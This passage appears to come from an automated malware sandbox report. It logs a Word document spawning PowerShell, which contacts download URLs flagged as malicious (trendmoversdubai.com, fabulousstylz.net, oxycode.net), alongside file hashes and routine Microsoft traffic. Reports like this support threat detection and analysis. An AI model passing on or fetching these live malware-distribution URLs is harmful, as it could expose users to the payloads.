MD5:DEAD2EE70165FD1397E062C44C8F1A75 | SHA256:B395CEA4EA6C60BFD1B5C72ED06F7F1C03CFCF7137C9AD86F5981EF3CE7EF62F | |||
| 3532 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bin | text | |
MD5:CC90D669144261B198DEAD45AA266572 | SHA256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899 | |||
| 3532 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres | binary | |
MD5:EDF26E6BCF5F77D3B8EBC5E00F6BBEF0 | SHA256:8DFEA6CCCDF12C928DE38CFAFD1F0B57F9D20E3BEFE23CDE5E85282EDE8A6088 | |||
| 5788 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_w5ppm3gq.jk3.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5788 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yzahjubr.sjy.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
78
TCP/UDP connections
89
DNS requests
25
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3508 | svchost.exe | GET | 200 | 2.16.241.12:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.16.241.12:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
3508 | svchost.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
5788 | powershell.exe | GET | 301 | 82.180.142.40:80 | http://trendmoversdubai.com/cgi-bin/B73/ | unknown | — | — | malicious |
5788 | powershell.exe | GET | 404 | 162.214.98.236:80 | http://oxycode.net/wp-admin/x/ | unknown | — | — | unknown |
5788 | powershell.exe | GET | 200 | 3.33.130.190:80 | http://fabulousstylz.net/248152296/TpI/ | unknown | — | — | malicious |
4712 | MoUsoCoreWorker.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 23.48.23.66:443 | https://omex.cdn.office.net/addinclassifier/officesharedentities | unknown | text | 314 Kb | whitelisted |
— | — | GET | 200 | 52.111.236.7:443 | https://messaging.lifecycle.office.com/getcustommessage16?app=0&ui=en-US&src=BizBar&messagetype=BizBar&hwid=04111-083-043729&ver=16.0.16026&lc=en-US&platform=10%3A0%3A19045%3A2%3A0%3A0%3A256%3A1%3A&productid=%7B1717C1E0-47D3-4899-A6D3-1022DB7415E0%7D%3A00411-10830-43729-AA720%3AOffice%2019%2C%20Office19Professional2019R_Retail%20edition&clientsessionid=%7BB890D65D-D649-4628-8E74-4D3C6BC6E3A8%7D&datapropertybag=%7B%22Audience%22%3A%22Production%22%2C%22AudienceGroup%22%3A%22Production%22%2C%22AudienceChannel%22%3A%22CC%22%2C%22Flight%22%3A%22ofgg6vdq3anjh131%2Cof3ttwdwizkwt531%2Cofskuekmq22yki31%22%7D | unknown | text | 542 b | whitelisted |
— | — | GET | 200 | 52.109.76.240:443 | https://officeclient.microsoft.com/config16/?lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16026&crev=3 | unknown | xml | 178 Kb | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4712 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 192.168.100.255:138 | — | — | — | whitelisted |
3508 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
3532 | WINWORD.EXE | 52.109.32.97:443 | officeclient.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | GB | whitelisted |
3508 | svchost.exe | 2.16.241.12:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 2.16.241.12:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
3508 | svchost.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
3508 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
officeclient.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
omex.cdn.office.net |
| whitelisted |
ecs.office.com |
| whitelisted |
trendmoversdubai.com |
| malicious |
messaging.lifecycle.office.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
Threats
Process | Message |
|---|---|
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
|
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
|
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
|